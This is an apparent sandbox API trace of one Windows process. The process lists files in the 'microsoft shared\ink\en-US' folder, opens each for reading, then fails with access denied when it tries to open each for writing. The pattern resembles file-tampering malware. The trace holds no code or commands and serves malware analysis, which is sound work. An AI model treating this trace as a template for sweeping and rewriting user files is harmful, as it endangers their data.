dwReserved1=0x77892bc0, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0098.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0098.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.925] AreFileApisANSI () returned 1 [0098.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0098.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.925] AreFileApisANSI () returned 1 [0098.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0098.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned 72 [0098.926] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.926] GetFileType (hFile=0x418) returned 0x1 [0098.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0098.926] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.926] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.926] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.927] CloseHandle (hObject=0x418) returned 1 [0098.927] AreFileApisANSI () returned 1 [0098.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0098.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned 72 [0098.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.927] GetLastError () returned 0x5 [0098.927] GetLastError () returned 0x5 [0098.927] SetLastError (dwErrCode=0x5) [0098.927] GetLastError () returned 0x5 [0098.927] SetLastError (dwErrCode=0x5) [0098.927] GetLastError () returned 0x5 [0098.927] SetLastError (dwErrCode=0x5) [0098.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0098.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0098.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.927] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da18a06, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7f875d00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ShapeCollector.exe.mui", cAlternateFileName="")) returned 1 [0098.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0098.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.928] AreFileApisANSI () returned 1 [0098.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui", lpUsedDefaultChar=0x0) returned 80 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0098.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0098.929] AreFileApisANSI () returned 1 [0098.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0098.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0098.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x8c8f0, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 80 [0098.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.929] GetFileType (hFile=0x418) returned 0x1 [0098.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0098.929] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.929] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.929] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.930] CloseHandle (hObject=0x418) returned 1 [0098.930] AreFileApisANSI () returned 1 [0098.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0098.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0098.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 80 [0098.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.930] GetLastError () returned 0x5 [0098.930] GetLastError () returned 0x5 [0098.930] SetLastError (dwErrCode=0x5) [0098.930] GetLastError () returned 0x5 [0098.930] SetLastError (dwErrCode=0x5) [0098.930] GetLastError () returned 0x5 [0098.930] SetLastError (dwErrCode=0x5) [0098.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0098.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0098.930] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.930] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.930] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x2c6cc, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="split.avi", cAlternateFileName="")) returned 1 [0098.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0098.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.931] AreFileApisANSI () returned 1 [0098.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi", lpUsedDefaultChar=0x0) returned 67 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0098.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.932] AreFileApisANSI () returned 1 [0098.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0098.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x823b8 [0098.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 67 [0098.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.932] GetFileType (hFile=0x418) returned 0x1 [0098.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0098.932] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.932] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.932] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.933] CloseHandle (hObject=0x418) returned 1 [0098.933] AreFileApisANSI () returned 1 [0098.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0098.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82448 [0098.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x82448, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 67 [0098.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.933] GetLastError () returned 0x5 [0098.933] GetLastError () returned 0x5 [0098.933] SetLastError (dwErrCode=0x5) [0098.933] GetLastError () returned 0x5 [0098.933] SetLastError (dwErrCode=0x5) [0098.933] GetLastError () returned 0x5 [0098.933] SetLastError (dwErrCode=0x5) [0098.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82448 | out: hHeap=0x20000) returned 1 [0098.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0098.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.933] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x327f590, 